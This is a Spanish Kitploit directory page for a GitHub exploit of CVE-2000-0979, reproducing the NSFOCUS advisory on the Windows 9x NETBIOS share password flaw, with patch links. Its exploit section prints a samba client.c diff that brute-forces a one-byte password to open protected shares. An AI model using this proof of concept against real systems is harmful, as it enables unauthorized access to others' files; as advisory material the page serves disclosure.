Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2000-0979 — CVE-2000-0979 | Kitploit
Herramientas/GitHubGitHub/z6543/cve-2000-0979
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de Penetración
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

Ver Repositorio
22hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2000-0979

CVE-2000-0979.rb es la herramienta independiente para explotar CVE-2000-0979 contra el servicio SMB de Windows 95.

msf_2000_0979.rb es el módulo de Metasploit. Puedes copiarlo en ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩

MSF module

¡Más documentación próximamente!

Aviso original

NSFOCUS Security Advisory(SA2000-05)

Tema: Vulnerabilidad en la verificación de contraseña NETBIOS de Microsoft Windows 9x

Fecha de publicación: 24 de agosto de 2000 Fecha de actualización: 11 de octubre de 2000

Sistemas afectados

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

Sistemas no afectados

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

Impacto

Existe una vulnerabilidad en el esquema de verificación de contraseña utilizado por la implementación del protocolo NETBIOS de Microsoft Windows 9x. Esta vulnerabilidad permitirá a cualquier usuario acceder al servicio de uso compartido de archivos de Windows 9x con protección por contraseña. El atacante no necesita conocer la contraseña del recurso compartido.

Descripción

Puedes establecer una contraseña para proteger los recursos compartidos del sistema Microsoft Windows 9x. Pero existe una vulnerabilidad en el esquema de verificación de contraseña utilizado por la implementación del protocolo NETBIOS de Microsoft Windows 9x. Para verificar la contraseña, la longitud de la contraseña depende de la longitud de los datos enviados desde el cliente al servidor. Es decir, si un cliente establece la longitud de la contraseña en un byte y envía el paquete con la contraseña en texto plano al servidor, el servidor solo la comparará con el primer byte de la contraseña compartida (texto plano) y, si coinciden, el proceso de verificación se completa. Todo lo que un atacante necesita hacer es adivinar y probar el primer byte de la contraseña en la víctima. El sistema de administración remota de Windows 9x también se ve afectado porque adopta el mismo método de autenticación de contraseña compartida.

Exploit

Aquí tienes un ejemplo sencillo para demostrar este fallo. Obtén el paquete fuente de samba y modifica source/client/client.c así:

root@kitploit:~

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

       DEBUG(4,(" session setup ok\n"));

+/*
       if (!cli_send_tconX(c, share, "?????",
                           password, strlen(password)+1)) {
               DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
               cli_shutdown(c);
               return NULL;
       }
+*/
+
+      password[0] = 0;
+      c->sec_mode = 0;
+      do{
+
+        password[0]+=1;
+
+      }while(!cli_send_tconX(c, share, "?????", password, 1));

      DEBUG(4,(" tconx ok\n"));

Solución alternativa

Cierra el servicio compartido de Archivos e Impresoras de Microsoft.

Solución

Microsoft ha sido informado y ha publicado un boletín de seguridad sobre este fallo.

El boletín está disponible en :

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

Los parches están disponibles en:

. Microsoft Windows 95

Parche disponible próximamente

. Microsoft Windows 98 y 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

DESCARGO DE RESPONSABILIDAD

LA INFORMACIÓN PROPORCIONADA ES PUBLICADA POR NSFOCUS "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO. NSFOCUS RECHAZA TODAS LAS GARANTÍAS, YA SEAN EXPRESAS O IMPLÍCITAS, EXCEPTO LAS GARANTÍAS DE COMERCIABILIDAD. EN NINGÚN CASO NSFOCUS SERÁ RESPONSABLE DE DAÑO ALGUNO, INCLUIDOS LOS DAÑOS DIRECTOS, INDIRECTOS, INCIDENTALES, CONSECUENTES, PÉRDIDA DE BENEFICIOS COMERCIALES O DAÑOS ESPECIALES, INCLUSO SI NSFOCUS HA SIDO ADVERTIDO DE LA POSIBILIDAD DE TALES DAÑOS. LA DISTRIBUCIÓN O REPRODUCCIÓN DE LA INFORMACIÓN SE PERMITE SIEMPRE QUE EL AVISO NO SEA MODIFICADO DE NINGUNA MANERA.

?Copyright 1999-2000 NSFOCUS. Todos los derechos reservados. Términos de uso.

NSFOCUS Security Team [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)

Descargar herramienta